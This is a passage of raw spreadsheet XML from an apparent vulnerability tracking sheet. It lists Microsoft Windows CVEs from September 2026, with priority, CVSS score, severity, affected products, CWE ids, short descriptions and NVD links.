r="S383" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T383" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t></is></c></row><row r="384"><c r="A384" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C384" s="5" t="inlineStr"><is><t>CVE-2026-69462</t></is></c><c r="D384" s="5" t="n"><v>8</v></c><c r="E384" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F384" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G384" s="5" t="inlineStr" /><c r="H384" s="5" t="n"><v>0.007</v></c><c r="I384" s="5" t="inlineStr" /><c r="J384" s="5" t="inlineStr" /><c r="K384" s="5" t="inlineStr" /><c r="L384" s="5" t="inlineStr" /><c r="M384" s="5" t="inlineStr" /><c r="N384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P384" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q384" s="5" t="inlineStr" /><c r="R384" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S384" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T384" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t></is></c></row><row r="385"><c r="A385" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C385" s="5" t="inlineStr"><is><t>CVE-2026-69481</t></is></c><c r="D385" s="5" t="n"><v>8</v></c><c r="E385" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F385" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G385" s="5" t="inlineStr" /><c r="H385" s="5" t="n"><v>0.007</v></c><c r="I385" s="5" t="inlineStr" /><c r="J385" s="5" t="inlineStr" /><c r="K385" s="5" t="inlineStr" /><c r="L385" s="5" t="inlineStr" /><c r="M385" s="5" t="inlineStr" /><c r="N385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P385" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q385" s="5" t="inlineStr" /><c r="R385" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S385" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T385" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t></is></c></row><row r="386"><c r="A386" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C386" s="5" t="inlineStr"><is><t>CVE-2026-69503</t></is></c><c r="D386" s="5" t="n"><v>8</v></c><c r="E386" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F386" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G386" s="5" t="inlineStr" /><c r="H386" s="5" t="n"><v>0.008</v></c><c r="I386" s="5" t="inlineStr" /><c r="J386" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K38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386" s="5" t="inlineStr" /><c r="M386" s="5" t="inlineStr" /><c r="N386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P386" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q386" s="5" t="inlineStr" /><c r="R386" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S386" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T386" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t></is></c></row><row r="387"><c r="A387" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C387" s="5" t="inlineStr"><is><t>CVE-2026-69505</t></is></c><c r="D387" s="5" t="n"><v>8</v></c><c r="E387" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F387" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G387" s="5" t="inlineStr" /><c r="H387" s="5" t="n"><v>0.008</v></c><c r="I387" s="5" t="inlineStr" /><c r="J387" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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87" s="5" t="inlineStr" /><c r="M387" s="5" t="inlineStr" /><c r="N387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P387" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q387" s="5" t="inlineStr" /><c r="R387" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S387" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T387" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t></is></c></row><row r="388"><c r="A388" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C388" s="5" t="inlineStr"><is><t>CVE-2026-69512</t></is></c><c r="D388" s="5" t="n"><v>8</v></c><c r="E388" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F388" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G388" s="5" t="inlineStr" /><c r="H388" s="5" t="n"><v>0.008</v></c><c r="I388" s="5" t="inlineStr" /><c r="J388" s="5" t="inlineStr" /><c r="K388" s="5" t="inlineStr" /><c r="L388" s="5" t="inlineStr" /><c r="M388" s="5" t="inlineStr" /><c r="N388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P388" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q388" s="5" t="inlineStr" /><c r="R388" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S388" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T388" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t></is></c></row><row r="389"><c r="A389" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C389" s="5" t="inlineStr"><is><t>CVE-2026-69619</t></is></c><c r="D389" s="5" t="n"><v>8</v></c><c r="E389" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F389" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G389" s="5" t="inlineStr" /><c r="H389" s="5" t="n"><v>0.008</v></c><c r="I389" s="5" t="inlineStr" /><c r="J389" s="5" t="inlineStr" /><c r="K389" s="5" t="inlineStr" /><c r="L389" s="5" t="inlineStr" /><c r="M389" s="5" t="inlineStr" /><c r="N389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P389" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q389" s="5" t="inlineStr" /><c r="R389" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S389" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T389" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t></is></c></row><row r="390"><c r="A390" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C390" s="5" t="inlineStr"><is><t>CVE-2026-69623</t></is></c><c r="D390" s="5" t="n"><v>8</v></c><c r="E390" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F390" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G390" s="5" t="inlineStr" /><c r="H390" s="5" t="n"><v>0.008999999999999999</v></c><c r="I390" s="5" t="inlineStr" /><c r="J390" s="5" t="inlineStr" /><c r="K390" s="5" t="inlineStr" /><c r="L390" s="5" t="inlineStr" /><c r="M390" s="5" t="inlineStr" /><c r="N390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P390" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q390" s="5" t="inlineStr" /><c r="R390" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S390" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T390" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t></is></c></row><row r="391"><c r="A391" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C391" s="5" t="inlineStr"><is><t>CVE-2026-69625</t></is></c><c r="D391" s="5" t="n"><v>8</v></c><c r="E391" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F391" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G391" s="5" t="inlineStr" /><c r="H391" s="5" t="n"><v>0.007</v></c><c r="I391" s="5" t="inlineStr" /><c r="J391" s="5" t="inlineStr" /><c r="K391" s="5" t="inlineStr" /><c r="L391" s="5" t="inlineStr" /><c r="M391" s="5" t="inlineStr" /><c r="N391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P391" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q391" s="5" t="inlineStr" /><c r="R391" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S391" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T391" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t></is></c></row><row r="392"><c r="A392" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B392" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C392" s="5" t="inlineStr"><is><t>CVE-2026-69643</t></is></c><c r="D392" s="5" t="n"><v>8</v></c><c r="E392" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F392" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G392" s="5" t="inlineStr" /><c r="H392" s="5" t="n"><v>0.008</v></c><c r="I392" s="5" t="inlineStr" /><c r="J392" s="5" t="inlineStr" /><c r="K392" s="5" t="inlineStr" /><c r="L392" s="5" t="inlineStr" /><c r="M392" s="5" t="inlineStr" /><c r="N392" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O392" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P392" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q392" s="5" t="inlineStr" /><c r="R392" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S392" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T392" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t></is></c></row><row r="393"><c r="A393" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B393" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C393" s="5" t="inlineStr"><is><t>CVE-2026-69681</t></is></c><c r="D393" s="5" t="n"><v>8</v></c><c r="E393" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F393" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G393" s="5" t="inlineStr" /><c r="H393" s="5" t="n"><v>0.008</v></c><c r="I393" s="5" t="inlineStr" /><c r="J393" s="5" t="inlineStr" /><c r="K393" s="5" t="inlineStr" /><c r="L393" s="5" t="inlineStr" /><c r="M393" s="5" t="inlineStr" /><c r="N393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O393" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P393" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q393" s="5" t="inlineStr" /><c r="R393" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S393" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T393" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t></is></c></row><row r="394"><c r="A394" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C394" s="5" t="inlineStr"><is><t>CVE-2026-69689</t></is></c><c r="D394" s="5" t="n"><v>8</v></c><c r="E394" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F394" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G394" s="5" t="inlineStr" /><c r="H394" s="5" t="n"><v>0.008</v></c><c r="I394" s="5" t="inlineStr" /><c r="J394" s="5" t="inlineStr" /><c r="K394" s="5" t="inlineStr" /><c r="L394" s="5" t="inlineStr" /><c r="M394" s="5" t="inlineStr" /><c r="N394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P394" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q394" s="5" t="inlineStr" /><c r="R394" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="S394" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T394" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t></is></c></row><row r="395"><c r="A395" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C395" s="5" t="inlineStr"><is><t>CVE-2026-69714</t></is></c><c r="D395" s="5" t="n"><v>8</v></c><c r="E395" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F395" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G395" s="5" t="inlineStr" /><c r="H395" s="5" t="n"><v>0.008</v></c><c r="I395" s="5" t="inlineStr" /><c r="J395" s="5" t="inlineStr" /><c r="K395" s="5" t="inlineStr" /><c r="L395" s="5" t="inlineStr" /><c r="M395" s="5" t="inlineStr" /><c r="N395" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P395" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q395" s="5" t="inlineStr" /><c r="R395" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S395" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T395" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t></is></c></row><row r="396"><c r="A396" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C396" s="5" t="inlineStr"><is><t>CVE-2026-69717</t></is></c><c r="D396" s="5" t="n"><v>8</v></c><c r="E396" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F396" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G396" s="5" t="inlineStr" /><c r="H396" s="5" t="n"><v>0.007</v></c><c r="I396" s="5" t="inlineStr" /><c r="J396" s="5" t="inlineStr" /><c r="K396" s="5" t="inlineStr" /><c r="L396" s="5" t="inlineStr" /><c r="M396" s="5" t="inlineStr" /><c r="N396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P396" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q396" s="5" t="inlineStr" /><c r="R396" s="5" t="inlineStr"><is><t>CWE-125, CWE-822, CWE-843</t></is></c><c r="S396" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T396" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t></is></c></row><row r="397"><c r="A397" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C397" s="5" t="inlineStr"><is><t>CVE-2026-69727</t></is></c><c r="D397" s="5" t="n"><v>8</v></c><c r="E397" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F397" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G397" s="5" t="inlineStr" /><c r="H397" s="5" t="n"><v>0.007</v></c><c r="I397" s="5" t="inlineStr" /><c r="J397" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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97" s="5" t="inlineStr" /><c r="M397" s="5" t="inlineStr" /><c r="N397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P397" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q397" s="5" t="inlineStr" /><c r="R397" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S397" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T397" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t></is></c></row><row r="398"><c r="A398" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C398" s="5" t="inlineStr"><is><t>CVE-2026-69762</t></is></c><c r="D398" s="5" t="n"><v>8</v></c><c r="E398" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F398" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G398" s="5" t="inlineStr" /><c r="H398" s="5" t="n"><v>0.007</v></c><c r="I398" s="5" t="inlineStr" /><c r="J398" s="5" t="inlineStr" /><c r="K398" s="5" t="inlineStr" /><c r="L398" s="5" t="inlineStr" /><c r="M398" s="5" t="inlineStr" /><c r="N398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P398" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q398" s="5" t="inlineStr" /><c r="R398" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S398" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T398" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t></is></c></row><row r="399"><c r="A399" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C399" s="5" t="inlineStr"><is><t>CVE-2026-69773</t></is></c><c r="D399" s="5" t="n"><v>8</v></c><c r="E399" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F399" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G399" s="5" t="inlineStr" /><c r="H399" s="5" t="n"><v>0.007</v></c><c r="I399" s="5" t="inlineStr" /><c r="J399" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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99" s="5" t="inlineStr" /><c r="M399" s="5" t="inlineStr" /><c r="N399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P399" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q399" s="5" t="inlineStr" /><c r="R399" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S399" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T399" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t></is></c></row><row r="400"><c r="A400" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C400" s="5" t="inlineStr"><is><t>CVE-2026-69777</t></is></c><c r="D400" s="5" t="n"><v>8</v></c><c r="E400" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F400" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G400" s="5" t="inlineStr" /><c r="H400" s="5" t="n"><v>0.005</v></c><c r="I400" s="5" t="inlineStr" /><c r="J400" s="5" t="inlineStr" /><c r="K400" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L400" s="5" t="inlineStr" /><c r="M400" s="5" t="inlineStr" /><c r="N400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P400" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q400" s="5" t="inlineStr" /><c r="R400" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S400" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t></is></c><c r="T400" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t></is></c></row><row r="401"><c r="A401" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B401" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C401" s="5" t="inlineStr"><is><t>CVE-2026-69807</t></is></c><c r="D401" s="5" t="n"><v>8</v></c><c r="E401" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F401" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G401" s="5" t="inlineStr" /><c r="H401" s="5" t="n"><v>0.008999999999999999</v></c><c r="I401" s="5" t="inlineStr" /><c r="J401" s="5" t="inlineStr" /><c r="K401" s="5" t="inlineStr" /><c r="L401" s="5" t="inlineStr" /><c r="M401" s="5" t="inlineStr" /><c r="N401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O401" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P401" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q401" s="5" t="inlineStr" /><c r="R401" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S401" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T401" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t></is></c></row><row r="402"><c r="A402" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C402" s="5" t="inlineStr"><is><t>CVE-2026-69826</t></is></c><c r="D402" s="5" t="n"><v>8</v></c><c r="E402" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F402" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G402" s="5" t="inlineStr" /><c r="H402" s="5" t="n"><v>0.007</v></c><c r="I402" s="5" t="inlineStr" /><c r="J402" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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02" s="5" t="inlineStr" /><c r="M402" s="5" t="inlineStr" /><c r="N402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P402" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q402" s="5" t="inlineStr" /><c r="R402" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S402" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T402" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t></is></c></row><row r="403"><c r="A403" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C403" s="5" t="inlineStr"><is><t>CVE-2026-69847</t></is></c><c r="D403" s="5" t="n"><v>8</v></c><c r="E403" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F403" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G403" s="5" t="inlineStr" /><c r="H403" s="5" t="n"><v>0.005</v></c><c r="I403" s="5" t="inlineStr" /><c r="J403" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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03" s="5" t="inlineStr" /><c r="M403" s="5" t="inlineStr" /><c r="N403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P403" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q403" s="5" t="inlineStr" /><c r="R403" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S403" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T403" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t></is></c></row><row r="404"><c r="A404" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B404" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C404" s="5" t="inlineStr"><is><t>CVE-2026-69875</t></is></c><c r="D404" s="5" t="n"><v>8</v></c><c r="E404" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F404" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G404" s="5" t="inlineStr" /><c r="H404" s="5" t="n"><v>0.008</v></c><c r="I404" s="5" t="inlineStr" /><c r="J404" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K40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404" s="5" t="inlineStr" /><c r="M404" s="5" t="inlineStr" /><c r="N404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O404" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P404" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q404" s="5" t="inlineStr" /><c r="R404" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S404" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T404" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t></is></c></row><row r="405"><c r="A405" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C405" s="5" t="inlineStr"><is><t>CVE-2026-69876</t></is></c><c r="D405" s="5" t="n"><v>8</v></c><c r="E405" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F405" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G405" s="5" t="inlineStr" /><c r="H405" s="5" t="n"><v>0.006</v></c><c r="I405" s="5" t="inlineStr" /><c r="J405" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K405" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L405" s="5" t="inlineStr" /><c r="M405" s="5" t="inlineStr" /><c r="N405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P405" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q405" s="5" t="inlineStr" /><c r="R405" s="5" t="inlineStr"><is><t>CWE-415, CWE-416</t></is></c><c r="S405" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T405" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t></is></c></row><row r="406"><c r="A406" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C406" s="5" t="inlineStr"><is><t>CVE-2026-83948</t></is></c><c r="D406" s="5" t="n"><v>8</v></c><c r="E406" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F406" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G406" s="5" t="inlineStr" /><c r="H406" s="5" t="n"><v>0.004</v></c><c r="I406" s="5" t="inlineStr" /><c r="J406" s="5" t="inlineStr" /><c r="K406" s="5" t="inlineStr"><is><t>microsoft:vm_repair</t></is></c><c r="L406" s="5" t="inlineStr" /><c r="M406" s="5" t="inlineStr" /><c r="N406" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P406" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q406" s="5" t="inlineStr" /><c r="R406" s="5" 